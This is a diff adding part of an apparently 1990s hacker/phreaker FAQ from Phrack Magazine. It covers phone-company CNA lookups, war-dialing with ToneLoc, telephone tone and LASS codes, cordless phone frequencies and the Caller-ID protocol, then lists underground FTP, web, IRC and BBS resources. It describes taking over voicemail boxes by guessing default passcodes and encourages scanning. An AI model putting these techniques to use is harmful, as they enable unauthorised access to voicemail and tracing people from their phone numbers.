+  908  254-9929  254-9930
+  908  558-9929  558-9930
+  908  560-9929  560-9930
+  908  776-9930  776-9930
+
+
+16. What is a CNA number?
+
+CNA stands for Customer Name and Address.  The CNA number is a phone
+number for telephone company personnel to call and get the name and
+address for a phone number.  If a telephone lineman finds a phone line
+he does not recognize, he can use the ANI number to find it's phone
+number and then call the CNA operator to see who owns it and where
+they live.
+
+Normal CNA numbers are available only to telephone company personnel.
+Private citizens may legally get CNA information from private
+companies.  Two such companies are:
+
+Unidirectory    (900)933-3330
+Telename        (900)884-1212
+
+Note that these are 900 numbers, and will cost you approximately one
+dollar per minute.
+
+If you are in 312 or 708, AmeriTech has a pay-for-play CNA service
+available to the general public.  The number is 796-9600.  The cost is
+$.35/call and can look up two numbers per call.
+
+If you are in 415, Pacific Bell offers a public access CNA service at
+(415)781-5271.
+
+An interesting number is The House of Windsor Collection at
+(800)433-3210.  If you dial it and press 1 to request a catalog, it
+will ask for your telephone number.  If will then tell you the street
+name of any telephone number you enter.
+
+
+17. What is the telephone company CNA number for my area?
+
+203  203-771-8080     CT
+516  516-321-5700     Hempstead/Long Island, NY
+614  614-464-0123     Columbus/Steubenville, OH
+813  813-270-8711     Ft. Meyers/St. Petersburg/Tampa, FL
+513  513-397-9110     Cincinnati/Dayton, OH
+
+
+18. What are some numbers that always ring busy?
+
+  216  xxx-9887              Akron/Canton/Cleveland/Lorain/Youngstown, OH
+  303  431-0000              Denver, CO
+  303  866-8660              Denver, CO
+  316  952-7265              Dodge City/Wichita, KS
+  501  377-99xx              AR
+  719  472-3773              Colorado Springs/Leadville/Pueblo, CO
+  805  255-0699              Bakersfield/Santa Barbara, CA
+  818  885-0699              Pasadena, CA
+  906  632-9999              Marquette/Sault Ste. Marie, MI
+  906  635-9999              Marquette/Sault Ste. Marie, MI
+  914  576-9903              Peekskill/Poughkeepsie/White Plains/Yonkers, NY
+
+
+19. What are some numbers that temporarily disconnect phone service?
+
+  314  511        Columbia/Jefferson City/St.Louis, MO (1 minute)
+  404  420        Atlanta, GA                          (5 minutes)
+  405  953        Enid/Oklahoma City, OK               (1 minute)
+  407  511        Orlando/West Palm Beach, FL          (1 minute)
+  512  200        Austin/Corpus Christi, TX            (1 minute)
+  516  480        Hempstead/Long Island, NY            (1 minute)
+  603  980        NH
+  614  xxx-9894   Columbus/Steubenville, OH
+  805  119        Bakersfield/Santa Barbara, CA        (3 minutes)
+  919  211 or 511 Durham, NC                           (10 min - 1 hour)
+
+
+20. What is scanning?
+
+Scanning is dialing a large number of telephone numbers in the hope
+of finding interesting carriers (computers) or tones.
+
+Scanning can be done by hand, although dialing several thousand
+telephone numbers by hand is extremely boring and takes a long time.
+
+Much better is to use a scanning program, sometimes called a war
+dialer or a demon dialer.  Currently, the best war dialer available to
+PC-DOS users is ToneLoc from Minor Threat and Mucho Maas.  ToneLoc can
+be ftp'd from ftp.paranoia.com /pub/toneloc/.
+
+A war dialer will dial a range of numbers and log what it finds at
+each number.  You can then only dial up the numbers that the war
+dialer marked as carriers or tones.
+
+
+21. Is scanning illegal?
+
+Excerpt from: 2600, Spring 1990, Page 27:
+
+-BQ-
+In some places, scanning has been made illegal.  It would be hard,
+though, for someone to file a complaint against you for scanning since
+the whole purpose is to call every number once and only once.  It's
+not likely to be thought of as harassment by anyone who gets a single
+phone call from a scanning computer.  Some central offices have been
+known to react strangely when people start scanning.  Sometimes you're
+unable to get a dialtone for hours after you start scanning.  But
+there is no uniform policy.  The best thing to do is to first find out
+if you've got some crazy law saying you can't do it.  If, as is
+likely, there is no such law, the only way to find out what happens is
+to give it a try.
+-EQ-
+
+It should be noted that a law making scanning illegal was recently
+passed in Colorado Springs, CO.  It is now illegal to place a call
+in Colorado Springs without the intent to communicate.
+
+
+22. Where can I purchase a lineman's handset?
+
+Contact East
+335 Willow Street
+North Andover, MA 01845-5995
+(508)682-2000
+
+Jensen Tools
+7815 S. 46th Street
+Phoenix, AZ 85044-5399
+
+Time Motion Tools
+12778 Brookprinter Place
+Poway, CA 92064
+(619)679-0303
+
+
+23. What are the DTMF frequencies?
+
+DTMF stands for Dual Tone Multi Frequency.  These are the tones you
+get when you press a key on your telephone touchpad.  The tone of the
+button is the sum of the column and row tones.  The ABCD keys do not
+exist on standard telephones.
+
+	 1209 1336 1477 1633
+ 
+     697   1    2    3    A
+
+     770   4    5    6    B
+
+     852   7    8    9    C
+
+     941   *    0    #    D
+
+
+24. What are the frequencies of the telephone tones?
+
+Type                Hz          On      Off
+---------------------------------------------------------------------
+Dial Tone         350 & 400     ---     ---
+Busy Signal       480 & 620     0.5     0.5
+Toll Congestion   480 & 620     0.2     0.3
+Ringback (Normal) 440 & 480     2.0     4.0
+Ringback (PBX)    440 & 480     1.5     4.5
+Reorder (Local)   480 & 620     3.0     2.0
+Invalid Number    200 & 400
+Hang Up Warning 1400 & 2060     0.1     0.1
+Hang Up         2450 & 2600     ---     ---
+
+
+25. What are all of the * (LASS) codes?
+
+Local Area Signalling Services (LASS) and Custom Calling Feature
+Control Codes:
+
+(These appear to be standard, but may be changed locally)
+
+Service                     Tone    Pulse/rotary   Notes
+--------------------------------------------------------------------------
+Assistance/Police           *12         n/a        [1]
+Cancel forwarding           *30         n/a        [C1]
+Automatic Forwarding        *31         n/a        [C1]
+Notify                      *32         n/a        [C1] [2]
+Intercom Ring 1 (..)        *51         1151       [3]
+Intercom Ring 2 (.._)       *52         1152       [3]
+Intercom Ring 3 (._.)       *53         1153       [3]
+Extension Hold              *54         1154       [3]
+Customer Originated Trace   *57         1157
+Selective Call Rejection    *60         1160       (or Call Screen)
+Selective Distinct Alert    *61         1161
+Selective Call Acceptance   *62         1162
+Selective Call Forwarding   *63         1163
+ICLID Activation            *65         1165
+Call Return (outgoing)      *66         1166
+Number Display Blocking     *67         1167       [4]
+Computer Access Restriction *68         1168
+Call Return (incoming)      *69         1169
+Call Waiting disable        *70         1170       [4]
+No Answer Call Transfer     *71         1171
+Usage Sensitive 3 way call  *71         1171
+Call Forwarding: start      *72 or 72#  1172
+Call Forwarding: cancel     *73 or 73#  1173
+Speed Calling (8 numbers)   *74 or 74#  1174
+Speed Calling (30 numbers)  *75 or 75#  1175
+Anonymous Call Rejection    *77         1177       [5] [M: *58]
+Call Screen Disable         *80         1160       (or Call Screen) [M: *50]
+Selective Distinct Disable  *81         1161       [M: *51]
+Select. Acceptance Disable  *82         1162
+Select. Forwarding Disable  *83         1163       [M: *53]
+ICLID Disable               *85         1165
+Call Return (cancel out)    *86         1186       [6] [M: *56]
+Anon. Call Reject (cancel)  *87         1187       [5] [M: *68]
+Call Return (cancel in)     *89         1189       [6] [M: *59]
+
+Notes:
+
+[C1]     - Means code used for Cellular One service
+[1]      - for cellular in Pittsburgh, PA A/C 412 in some areas
+[2]      - indicates that you are not local and maybe how to reach you
+[3]      - found in Pac Bell territory; Intercom ring causes a distinctive
+           ring to be generated on the current line; Hold keeps a call
+           connected until another extension is picked up
+[4]      - applied once before each call
+[5]      - A.C.R. blocks calls from those who blocked Caller ID
+           (used in C&P territory, for instance)
+[6]      - cancels further return attempts
+[M: *xx] - alternate code used for MLVP (multi-line variety package)
+           by Bellcore. It goes by different names in different RBOCs.
+           In Bellsouth it is called Prestige. It is an arrangement of
+           ESSEX like features for single or small multiple line groups.
+
+           The reason for different codes for some features in MLVP is that
+           call-pickup is *8 in MLVP so all *8x codes are reaasigned *5x
+
+
+26. What frequencies do cordless phones operate on?
+
+Here are the frequencies for the first generation 46/49mhz phones.
+The new 900mhz cordless phones are not covered.
+
+Channel    Handset Transmit    Base Transmit
+-------    ----------------    -------------
+   1          49.670mhz          46.610mhz
+   2          49.845             46.630
+   3          49.860             46.670
+   4          49.770             46.710
+   5          49.875             46.730
+   6          49.830             46.770
+   7          49.890             46.830
+   8          49.930             46.870
+   9          49.990             46.930
+  10          49.970             46.970
+
+
+27. What is Caller-ID?
+
+This FAQ answer is stolen from Rockewell:
+
+Calling Number Delivery (CND), better known as Caller ID, is a
+telephone service intended for residential and small business
+customers.  It allows the called Customer Premises Equipment (CPE) to
+receive a calling party's directory number and the date and time of
+the call during the first 4 second silent interval in the ringing
+cycle.
+
+Parameters
+~~~~~~~~~~
+The data signalling interface has the following characteristics:
+
+        Link Type:                              2-wire, simplex
+	Transmission Scheme:		Analog, phase-coherent FSK
+	Logical 1 (mark)			1200 +/- 12 Hz
+	Logical 0 (space)			2200 +/- 22 Hz
+	Transmission Rate:			1200 bps
+	Transmission Level:			13.5 +/- dBm into 900 ohm load
+
+
+Protocol
+~~~~~~~~
+The protocol uses 8-bit data words (bytes), each bounded by a start
+bit and a stop bit.  The CND message uses the Single Data Message
+format shown below.
+
+| Channel  |  Carrier  |  Message  |  Message  |  Data       | Checksum |
+| Seizure  |  Signal   |  Type     |  Length   |  Word(s)    | Word     |
+| Signal   |           |  Word     |  Word     |             |          |
+
+Channel Siezure Signal
+~~~~~~~~~~~~~~~~~~~~~~
+The channel seizure is 30 continuous bytes of 55h (01010101) providing
+a detectable alternating function to the CPE (i.e. the modem data
+pump).
+
+Carrier Signal
+~~~~~~~~~~~~~~
+The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to
+condition the receiver for data.
+
+Message Type Word
+~~~~~~~~~~~~~~~~~
+The message type word indicates the service and capability associated
+with the data message.  The message type word for CND is 04h
+(00000100).
+
+Message Length Word
+~~~~~~~~~~~~~~~~~~~
+The message length word specifies the total number of data words to
+follow.
+
+Data Words
+~~~~~~~~~~
+The data words are encoded in ASCII and represent the following
+information:
+
+o  The first two words represent the month
+o  The next two words represent the day of the month
+o  The next two words represent the hour in local military time
+o  The next two words represent the minute after the hour
+o  The calling party's directory number is represented by the
+   remaining  words in the data word field
+
+If the calling party's directory number is not available to the
+terminating central office, the data word field contains an ASCII "O".
+If the calling party invokes the privacy capability, the data word
+field contains an ASCII "P".
+
+Checksum Word
+~~~~~~~~~~~~~
+The Checksum Word contains the twos complement of the modulo 256 sum
+of the other words in the data message (i.e., message type, message
+length, and data words).  The receiving equipment may calculate the
+modulo 256 sum of the received words and add this sum to the reveived
+checksum word.  A result of zero generally indicates that the message
+was correctly received.  Message retransmission is not supported.
+
+Example CNS Single Data Message
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+An example of a received CND message, beginning with the message type
+word, follows:
+
+04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51
+
+04h=  Calling number delivery information code (message type word)
+12h=  18 decimal; Number of data words (date,time, and directory
+      number words)
+ASCII 30,39= 09; September
+ASCII 33,30= 30; 30th day
+ASCII 31,32= 12; 12:00 PM
+ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM)
+ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling
+      party's directory number
+51h=  Checksum Word
+
+Data Access Arrangement (DAA) Requirements
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+To receive CND information, the modem monitors the phone line between
+the first and second ring bursts without causing the DAA to go off
+hook in the conventional sense, which would inhibit the transmission
+of CND by the local central office.  A simple modification to an
+existing DAA circuit easily accomplishes the task.
+
+Modem Requirements
+~~~~~~~~~~~~~~~~~~
+Although the data signalling interface parameters match those of a
+Bell 202 modem, the receiving CPE need not be a Bell 202 modem.  A
+V.23 1200 bps modem receiver may be used to demodulate the Bell 202
+signal.  The ring indicate bit (RI) may be used on a modem to indicate
+when to monitor the phone line for CND information.  After the RI bit
+sets, indicating the first ring burst, the host waits for the RI bit
+to reset.  The host then configures the modem to monitor the phone
+line for CND information.
+
+Signalling
+~~~~~~~~~~
+According to Bellcore specifications, CND signalling starts as early
+as 300 mS after the first ring burst and ends at least 475 mS before
+the second ring burst
+
+Applications
+~~~~~~~~~~~~
+Once CND information is received the user may process the information
+in a number of ways.
+
+1.  The date, time, and calling party's directory number can be
+    displayed.
+
+2.  Using a look-up table, the calling party's directory number can be
+    correlated with his or her name and the name displayed.
+
+3.  CND information can also be used in additional ways such as for:
+
+    a.  Bulletin board applications
+    b.  Black-listing applications
+    c.  Keeping logs of system user calls, or
+    d.  Implementing a telemarketing data base
+
+References
+~~~~~~~~~~
+For more information on Calling Number Delivery (CND), refer to
+Bellcore publications TR-TSY-000030 and TR-TSY-000031.
+
+To obtain Bellcore documents contact:
+
+	Bellcore Customer Service
+	60 New England Avenue, Room 1B252
+	Piscataway, NJ   08834-4196
+	(908) 699-5800
+
+
+28. What is a PBX?
+
+A PBX is a Private Branch Exchange.  A PBX is a small telephone switch
+owned by a company or organization.  Let's say your company has a
+thousand employees.  Without a PBX, you would need a thousand phone
+lines.  However, only 10% of your employees are talking on the phone
+at one time.  What if you had a computer that automatically found an
+outside line every time one of your employees picked up the telephone.
+With this type of system, you could get by with only paying for one
+hundred phone lines.  This is a PBX.
+
+
+29. What is a VMB?
+
+A VMB is a Voice Mail Box.  A VMB is a computer that acts as an
+answering machine for hundreds or thousands of users.  Each user will
+have their own Voice Mail Box on the system.  Each mail box will have
+a box number and a pass code.
+
+Without a passcode, you will usually be able to leave messages to
+users on the VMB system.  With a passcode, you can read messages and
+administer a mailbox.  Often, mailboxes will exist that were created
+by default or are no longer used.  These mailboxes may be taken over
+by guessing their passcode.  Often the passcode will be the mailbox
+number or a common number such as 1234.
+
+
+
+
+
+Section C: Resources
+~~~~~~~~~~~~~~~~~~~~
+
+01. What are some ftp sites of interest to hackers?
+
+  198.69.103.23                                           (Mac)
+  aeneas.mit.edu
+  alex.sp.cs.cmu.edu      /links/security                 (Misc)
+  alife.santafe.edu
+  aql.gatech.edu          /pub                            (40Hex)
+  asylum.sf.ca.us
+  athena-dist.mit.edu     /pub/ATHENA                     (Athena Project)
+  atlantis.utmb.edu
+  bellcore.com                                            (Bellcore)
+  camelot.usc.edu         /pub/cellular/DDIinfodemo       (Cellular)
+  cert.org                                                (CERT)
+  ciac.llnl.gov
+  coast.cs.purdue.edu     /pub                            (Security/COAST)
+  csrc.ncsl.nist.gov
+  dartmouth.edu           /pub/security                   (Security)
+  dg-rtp.dg.com
+  ds.internic.net
+  enlow.com
+  ftp.3com.com            /mirrors/zip                    (ZipCrypt)
+  ftp.3com.com            /Orange-Book                    (Orange Book)
+  ftp.acns.nwu.edu
+  ftp.alantec.com
+  ftp.armory.com          /pub/user/kmartind              (H/P)
+  ftp.armory.com          /pub/user/swallow
+  ftp.c3.lanl.gov
+  ftp.cc.rochester.edu
+  ftp.cert.dfn.de                                         (FIRST)
+  ftp.cic.net             /pub/e-serials/alphabetic/p/phrack (Zines)
+  ftp.cisco.com
+  ftp.clark.net           /pub/jcase                      (H/P)
+  ftp.cnam.fr
+  ftp.commerce.net        /pubs/standards/drafts/shttp.txt(Secure HyperText)
+  ftp.cs.colorado.edu
+  ftp.cs.ruu.nl
+  ftp.cs.uwm.edu          /pub/comp-privacy               (Privacy Digest)
+  ftp.cs.vu.nl
+  ftp.cs.yale.edu
+  ftp.csl.sri.com         /pub/nides                      (SRI)
+  ftp.csua.berkeley.edu   /pub/cypherpunks                (Crypto)
+  ftp.cyberspace.com      /pub/archive/defcon             (PhoneTag)
+  ftp.delmarva.com
+  ftp.dsi.unimi.it
+  ftp.ee.lbl.gov
+  ftp.eff.org             /pub/Publications/CuD           (EFF)
+  ftp.elelab.nsc.co.jp    /pub/security                   (Security)
+  ftp.etext.org                                           (Etext)
+  ftp.fc.net              /pub/defcon                     (DefCon)
+  ftp.fc.net              /pub/defcon/BBEEP               (BlueBeep)
+  ftp.fc.net              /pub/phrack                     (Phrack Magazine)
+  ftp.fc.net              /pub/phrack/underground         (Hacker Archives)
+  ftp.fh-berlin.de
+  ftp.foobar.com
+  ftp.funet.fi
+  ftp.gate.net            /pub/users/laura
+  ftp.gate.net            /pub/users/wakko
+  ftp.greatcircle.com     /pub/firewalls                  (Firewalls)
+  ftp.halcyon.com         /pub/cud                        (Zines)
+  ftp.IEunet.ie           /pub/security                   (Security)
+  ftp.ifi.uio.no
+  ftp.info.fundp.ac.be
+  ftp.informatik.uni-hamburg.de
+  ftp.inoc.dl.nec.com     /pub/security                   (Security)
+  ftp.isi.edu
+  ftp.llnl.gov            /pub                            (CIAC)
+  ftp.lysator.liu.se
+  ftp.mcs.com             /mcsnet.users/crisadm           (Virii)
+  ftp.near.net            /security/archives/phrack       (Zines)
+  ftp.nec.com
+  ftp.netcom.com          /pub/br/bradleym                (Virii)
+  ftp.netcom.com          /pub/da/daemon9
+  ftp.netcom.com          /pub/va/vandal                  (DnA)
+  ftp.netcom.com          /pub/zz/zzyzx                   (H/P)
+  ftp.netsys.com
+  ftp.ocs.mq.edu.au       /PC/Crypt                       (Crypto)
+  ftp.paranoia.com        /pub/toneloc/tl110.zip          (ToneLoc)
+  ftp.pop.psu.edu
+  ftp.primus.com          /pub/armchair                   (Phoney)
+  ftp.primus.com          /pub/security                   (Security)
+  ftp.psy.uq.oz.au
+  ftp.rahul.net           /pub/lps                        (Home of the FAQ)
+  ftp.sert.edu.au
+  ftp.sgi.com
+  ftp.std.com             /archives/alt.locksmithing      (Locksmithing)
+  ftp.std.com             /obi/Mischief/                  (MIT Guide to Locks)
+  ftp.std.com             /obi/Phracks                    (Zines)
+  ftp.sunet.se            /pub/network/monitoring         (Ethernet sniffers)
+  ftp.sura.net            /pub/security                   (SURAnet)
+  ftp.technet.sg
+  ftp.tis.com             /pub                            (TIS)
+  ftp.uspto.gov
+  ftp.uu.net              /doc/literary/obi/Phracks       (Zines)
+  ftp.uwp.edu                                             (Copy protection)
+  ftp.vis.colostate.edu
+  ftp.vix.com
+  ftp.vortex.com
+  ftp.warwick.ac.uk       /pub/cud                        (Zines)
+  ftp.win.tue.nl          /pub/security                   (Security)
+  ftp.winternet.com       /users/craigb                   (H/P)
+  ftp.wustl.edu           /doc/EFF                        (EFF)
+  furmint.nectar.cs.cmu.edu /security                     (Crypto)
+  garbo.uwasa.fi          /pc/crypt                       (Crypto)
+  gumby.dsd.trw.com
+  hplyot.obspm.fr
+  info.mcs.anl.gov
+  jerico.usc.edu
+  lcs.mit.edu             /telecom-archives               (Telecom archives)
+  lod.amaranth.com                                        (Legion of Doom)
+  l0pht.com                                               (The L0pht)
+  mac.archive.umich.edu
+  mary.iia.org            /pub/users/patriot              (Misc)
+  monet.ccs.itd.umich.edu
+  net.tamu.edu            /pub/security/TAMU              (Security)
+  net23.com               /pub                            (Max Headroom)
+  nic.ddn.mil             /scc                            (DDN Security)
+  nic.funet.fi            /pub/doc/cud                    (Zines)
+  oak.oakland.edu
+  paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics (Pyro)
+  parcftp.xerox.com
+  pyrite.rutgers.edu      /pub/security                   (Security)
+  relay.cs.toronto.edu    /doc/telecom-archives           (Telecom)
+  rena.dit.co.jp          /pub/security                   (Security)
+  research.att.com        /dist/internet_security         (AT&T)
+  ripem.msu.edu           /pub/crypt                      (Ripem)
+  rs1.rrz.uni-koeln.de                                    (Wordlists)
+  rtfm.mit.edu                                            (Etext)
+  rtfm.mit.edu            /pub/usenet-by-group            (Usenet FAQ's)
+  sable.ox.ac.uk                                          (Wordlists)
+  samadams.princeton.edu
+  scss3.cl.msu.edu        /pub/crypt                      (Crypto)
+  sierra.stanford.edu
+  spy.org                                                 (CSC)
+  suburbia.apana.org.au   /pub/unix/security              (Security)
+  sunsolve1.sun.com
+  tam.cs.ucdavis.edu
+  technion.ac.il
+  theta.iis.u-tokyo.ac.jp /pub1/security                  (Security)
+  thumper.bellcore.com
+  titania.mathematik.uni-ulm.de /pub/security             (Security)
+  toxicwaste.mit.edu      /pub/rsa129/README              (Breaking RSA)
+  uceng.uc.edu            /pub/kerberos.documentation     (Kerberos)
+  ugle.unit.no
+  vic.cc.purdue.edu
+  whacked.l0pht.com                                       (Mac + H/P)
+  wimsey.bc.ca            /pub/crypto                     (Crypto)
+
+
+02. What are some fsp sites of interest to hackers?
+
+  Third Stone From the Sun  132.241.180.91 6969
+
+
+03. What are some newsgroups of interest to hackers?
+
+  alt.2600                Do it 'til it hertz
+  alt.2600.hope.tech      Technology concerns for Hackers on Planet Earth 1994
+  alt.cellular
+  alt.cellular-phone-tech
+  alt.comp.virus
+  alt.cyberpunk           High-tech low-life.
+  alt.cyberspace          Cyberspace and how it should work.
+  alt.dcom.telecom        Discussion of telecommunications technology
+  alt.engr.explosives     [no description available]
+  alt.hackers             Descriptions of projects currently under development
+  alt.locksmithing        You locked your keys in *where*?
+  alt.hackers.malicious   The really bad guys - don't take candy from them
+  alt.ph.uk
+  alt.privacy.anon-server Tech. & policy matters of anonymous contact servers
+  alt.radio.pirate        Hide the gear, here comes the magic station-wagons.
+  alt.radio.scanner       Discussion of scanning radio receivers.
+  alt.satellite.tv.europe
+  alt.security            Security issues on computer systems
+  alt.security.index      Pointers to good stuff in misc.security (Moderated)
+  alt.security.keydist    Exchange of keys for public key encryption systems
+  alt.security.pgp        The Pretty Good Privacy package
+  alt.security.ripem      A secure email system illegal to export from the US
+  comp.dcom.cellular      [no description available]
+  comp.dcom.telecom       Telecommunications digest (Moderated)
+  comp.dcom.telecom.tech  [no description available]
+  comp.org.cpsr.announce  Computer Professionals for Social Responsibility
+  comp.org.cpsr.talk      Issues of computing and social responsibility
+  comp.org.eff.news       News from the Electronic Frontiers Foundation
+  comp.org.eff.talk       Discussion of EFF goals, strategies, etc.
+  comp.protocols.kerberos The Kerberos authentification server
+  comp.protocols.tcp-ip   TCP and IP network protocols
+  comp.risks              Risks to the public from computers & users
+  comp.security.announce  Announcements from the CERT about security
+  comp.security.misc      Security issues of computers and networks
+  comp.security.unix      Discussion of Unix security
+  comp.virus              Computer viruses & security (Moderated)
+  de.org.ccc              Mitteilungen des CCC e.V.
+  misc.security           Security in general, not just computers (Moderated)
+  rec.pyrotechnics        Fireworks, rocketry, safety, & other topics
+  rec.radio.scanner       [no description available]
+  rec.video.cable-tv      Technical and regulatory issues of cable television
+  sci.crypt               Different methods of data en/decryption
+
+
+04. What are some telnet sites of interest to hackers?
+
+  ntiabbs.ntia.doc.gov                  (NTIA)
+  telnet lust.isca.uiowa.edu 2600       (underground bbs) (temporarily down)
+
diff --git a/phrack47/8.txt b/phrack47/8.txt
new file mode 100644
index 0000000..8cd7d6c
--- /dev/null
+++ b/phrack47/8.txt
@@ -0,0 +1,1399 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 8 of 22
+
+
+05. What are some gopher sites of interest to hackers?
+
+  ba.com                  (Bell Atlantic)
+  csrc.ncsl.nist.gov      (NIST Security Gopher)
+  gopher.acm.org          (SIGSAC (Security, Audit & Control))
+  gopher.cpsr.org         (Computer Professionals for Social Responsibility)
+  gopher.cs.uwm.edu
+  gopher.eff.org          (Electonic Frontier Foundation)
+  gw.PacBell.com          (Pacific Bell)
+  iitf.doc.gov            (NITA -- IITF)
+  oss.net                 (Open Source Solutions)
+  spy.org                 (Computer Systems Consulting)
+  wiretap.spies.com       (Wiretap)
+
+
+06. What are some World wide Web (WWW) sites of interest to hackers?
+
+  http://alumni.caltech.edu/~dank/isdn/           (ISDN)
+  http://aset.rsoc.rockwell.com                   (NASA/MOD AIS Security)
+  http://aset.rsoc.rockwell.com/exhibit.html      (Tech. for Info Sec)
+  http://att.net/dir800                           (800 directory)
+  http://ausg.dartmouth.edu/security.html         (Security)
+  http://cs.purdue.edu/coast/coast.html           (Coast)
+  http://csrc.ncsl.nist.gov                       (NIST)
+  http://dhp.com/~pluvius
+  http://dfw.net/~aleph1                          (Eubercrackers)
+  http://draco.centerline.com:8080/~franl/crypto.html (Crypto)
+  http://everest.cs.ucdavis.edu/Security.html     (Security)
+  http://everest.cs.ucdavis.edu/slides/slides.html(Security Lab Slides)
+  http://ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html  (CSSCR)
+  http://first.org                                (FIRST)
+  http://ftp.tamu.edu/~abr8030/security.html      (Security)
+  http://hightop.nrl.navy.mil/potpourri.html      (Security)
+  http://hightop.nrl.navy.mil/rainbow.html        (Rainbow Books)
+  http://ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling)
+  http://ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS)
+  http://info.bellcore.com/BETSI/betsi.html       (Betsi)
+  http://infosec.nosc.mil/infosec.html            (SPAWAR INFOSEC)
+  http://l0pht.com                                (The l0pht)
+  http://l0pht.com/~oblivion/IIRG.html            (Phantasy Magazine)
+  http://mindlink.jolt.com                        (The Secrets of LockPicking)
+  http://mls.saic.com                             (SAIC MLS)
+  http://naic.nasa.gov/fbi/FBI_homepage.html      (FBI Homepage)
+  http://nasirc.hq.nasa.gov                       (NASA ASIRC)
+  http://ophie.hughes.american.edu/~ophie
+  http://ripco.com:8080/~glr/glr.html             (Full Disclosure)
+  http://spy.org                                  (CSC)
+  http://tansu.com.au/Info/security.html          (Comp and Net Security)
+  http://the-tech.mit.edu                         (LaMacchia case info)
+  http://wintermute.itd.nrl.navy.mil/5544.html    (Network Security)
+  http://www.aads.net                             (Ameritech)
+  http://www.alw.nih.gov/WWW/security.html        (Unix Security)
+  http://www.artcom.de/CCC                        (CCC Homepage)
+  http://www.aspentec.com/~frzmtdb/fun/hacker.html
+  http://www.aus.xanadu.com:70/1/EFA              (EFF Australia)
+  http://www.ba.com                               (Bell Atlantic)
+  http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win)
+  http://www.bell.com                             (MFJ Task Force)
+  http://www.bellcore.com/SECURITY/security.html  (Bellcore Security Products)
+  http://www.brad.ac.uk/~nasmith/index.html
+  http://www.bst.bls.com                          (BellSouth)
+  http://www.c3.lanl.gov/~mcn                     (Lanl)
+  http://www.cert.dfn.de/                         (German First Team)
+  http://www.commerce.net/information/standards/drafts/shttp.txt (HyperText)
+  http://www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html
+  http://www.cpsr.org/home                        (CPSR)
+  http://www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk)
+  http://www.cs.tufts.edu/~mcable/HackerCrackdown (Hacker Crackdown)
+  http://www.cs.umd.edu/~lgas
+  http://www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (Security)
+  http://www.csd.harris.com/secure_info.html      (Harris)
+  http://www.csl.sri.com                          (SRI Computer Science Lab)
+  http://www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe)
+  http://www.datafellows.fi                       (Data Fellows)
+  http://www.delmarva.com/raptor/raptor.html      (Raptor Network Isolator)
+  http://www.demon.co.uk/kbridge                  (KarlBridge)
+  http://www.digicash.com/ecash/ecash-home.html   (Digital Cash)
+  http://www.digital.com/info/key-secure-index.html(Digital Secure Systems)
+  http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html(Bugtraq)
+  http://www.eecs.nwu.edu/~jmyers/ids/index.html  (Intrusion Detection Systems)
+  http://www.eff.org/papers.html                  (EFF)
+  http://www.engin.umich.edu/~jgotts/boxes.html   (Box info)
+  http://www.engin.umich.edu/~jgotts/hack-faq.html(This document)
+  http://www.engin.umich.edu/~jgotts/underground.html
+  http://www.ensta.fr/internet/unix/sys_admin     (System administration)
+  http://www.etext.org/Zines/                     (Zines)
+  http://www.fc.net/defcon                        (DefCon)
+  http://www.fc.net/phrack.html                   (Phrack Magazine)
+  http://www.first.org/first/                     (FIRST)
+  http://www.greatcircle.com                      (Great Circle Associates)
+  http://www.hpcc.gov/blue94/section.4.6.html     (NSA)
+  http://www.ic.gov                               (The CIA)
+  http://www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)
+  http://www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook)
+  http://www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide)
+  http://www.net23.com                            (Max Headroom)
+  http://www.nist.gov                             (NIST)
+  http://www.pacbell.com                          (Pacific Bell)
+  http://www.paranoia.com/mthreat                 (ToneLoc)
+  http://www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)
+  http://www.phantom.com/~king                    (Taran King)
+  http://www.quadralay.com/www/Crypt/Crypt.html   (Quadralay Cryptography)
+  http://www.qualcomm.com/cdma/wireless.html      (Qualcomm CDMA)
+  http://www.research.att.com                     (AT&T)
+  http://ripco.com:8080/~glr/glr.html             (Full Disclosure)
+  http://www.rsa.com                              (RSA Data Security)
+  http://www.satelnet.org/~ccappuc
+  http://www.service.com/cm/uswest/usw1.html      (USWest)
+  http://www.shore.net/~oz/welcome.html           (Hack TV)
+  http://www.spy.org                              (Computer Systems Consulting)
+  http://www.sri.com                              (SRI)
+  http://www.tansu.com.au/Info/security.html      (Security Reference Index)
+  http://www.tis.com                              (Trusted Information Systems)
+  http://www.tri.sbc.com                          (Southwestern Bell)
+  http://www.uci.agh.edu.pl/pub/security          (Security)
+  http://www.umcc.umich.edu/~doug/virus-faq.html  (Virus)
+  http://www.usfca.edu/crackdown/crack.html       (Hacker Crackdown)
+  http://www.wam.umd.edu/~ankh/Public/devil_does_unix
+  http://www.wiltel.com                           (Wiltel)
+  http://www.winternet.com/~carolann/dreams.html
+  http://www.wired.com                            (Wired Magazine)
+
+
+07. What are some IRC channels of interest to hackers?
+
+  #2600
+  #cellular
+  #hack
+  #phreak
+  #linux
+  #realhack
+  #root
+  #unix
+  #warez
+
+
+08. What are some BBS's of interest to hackers?
+
+  Rune Stone              (203)832-8441
+  Hacker's Haven          (303)343-4053
+  Independent Nation      (315)656-4179
+  Ut0PiA                  (315)656-5135
+  underworld_1994.com     (514)683-1894
+  Digital Fallout         (516)378-6640
+  Alliance Communications (612)251-8596
+  Maas-Neotek             (617)855-2923
+  Apocalypse 2000         (708)676-9855
+  K0dE Ab0dE              (713)579-2276
